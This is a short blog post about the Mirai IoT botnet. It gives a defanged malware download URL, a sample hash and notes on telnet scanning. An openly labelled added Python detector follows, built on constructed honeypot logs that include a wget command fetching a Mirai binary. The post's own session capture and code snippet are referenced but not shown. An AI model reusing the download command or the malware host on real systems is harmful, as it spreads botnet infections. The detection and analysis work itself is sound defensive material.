Botnet, DDoS, Security, Uncategorised

Mirai IoT botnet up close

Since the release of the Mirai source code and the recent DDoS attacks on Dyn, the telnet cyberspace has exploded with scanners and DDoS bots.

This is what a telnet session from an infected Mirai host looks like:

Notice how it grabs the malware from this URL: hxxp://137.74.49.209:80/bins/mirai.x86

Here is the information on the binary caught:

SHA256: e8289b100ebbac7243895bdbe3cc57cd36e1c5e2ac055d275a5a082f4aca4e79
File name: mirai.x86_578f88f69e5b53cb726d17d530284551

https://virustotal.com/en/file/e8289b100ebbac7243895bdbe3cc57cd36e1c5e2ac055d275a5a082f4aca4e79/analysis/

Once the loader has dropped the binary and run it, the malware begins to randomly scan the IPv4 space for open and insecure telnet services. (Obviously I am skipping a lot of steps here.)

You can see that happening in this code snippet:

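As an added example (not the Mirai code referenced above, and not from the original post), two defender-side checks over constructed log lines: pulling the bot binary download URL out of a telnet honeypot transcript, and flagging a source whose telnet connections fan out to many distinct hosts, which is what the random IPv4 scanning described above looks like in flow data. The server 203.0.113.10, the log formats and the fan-out threshold are assumptions.

```python
import re
from collections import defaultdict

# Download stage: the infected host fetches the bot binary from an HTTP server
# under a /bins/mirai.<arch> path, as seen in the session transcript above.
BIN_URL = re.compile(r"https?://[\w.\-]+(?::\d+)?/bins/mirai\.\w+")

TELNET_PORTS = {23}
FANOUT_THRESHOLD = 50   # distinct telnet targets from one source in the window (assumed)

# Constructed honeypot transcript: "<timestamp> <client ip> cmd: <command>"
SESSION_LINES = [
    "2016-10-28T10:01:02 10.0.0.5 cmd: enable",
    "2016-10-28T10:01:03 10.0.0.5 cmd: wget http://203.0.113.10:80/bins/mirai.x86",
    "2016-10-28T10:01:04 10.0.0.5 cmd: chmod 777 mirai.x86",
]

# Constructed flow records: "<timestamp> <src ip> <dst ip> <dst port>".
# 10.0.0.5 sweeps 60 distinct hosts on port 23; 10.0.0.9 is ordinary traffic.
FLOW_LINES = (
    [f"2016-10-28T10:05:{i % 60:02d} 10.0.0.5 198.51.100.{i} 23" for i in range(1, 61)]
    + ["2016-10-28T10:05:01 10.0.0.9 192.0.2.10 23",
       "2016-10-28T10:05:02 10.0.0.9 192.0.2.11 23",
       "2016-10-28T10:05:03 10.0.0.9 192.0.2.12 80"]
)


def extract_binary_urls(session_lines):
    """Return (client_ip, url) pairs for commands that fetch a Mirai binary."""
    hits = []
    for line in session_lines:
        _ts, src, rest = line.split(" ", 2)
        for url in BIN_URL.findall(rest):
            hits.append((src, url))
    return hits


def telnet_scanners(flow_lines, threshold=FANOUT_THRESHOLD):
    """Map source ip -> distinct telnet targets for sources at or above the threshold."""
    targets = defaultdict(set)
    for line in flow_lines:
        _ts, src, dst, dport = line.split()
        if int(dport) in TELNET_PORTS:
            targets[src].add(dst)
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) >= threshold}


if __name__ == "__main__":
    print("binary fetches:", extract_binary_urls(SESSION_LINES))
    print("telnet scanners:", telnet_scanners(FLOW_LINES))
```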

Also make sure to check out SpoofIT’s writeups on Mirai here: http://www.spoofit.org/new-mirai-cc-deployed/ and http://www.spoofit.org/mirai-samples/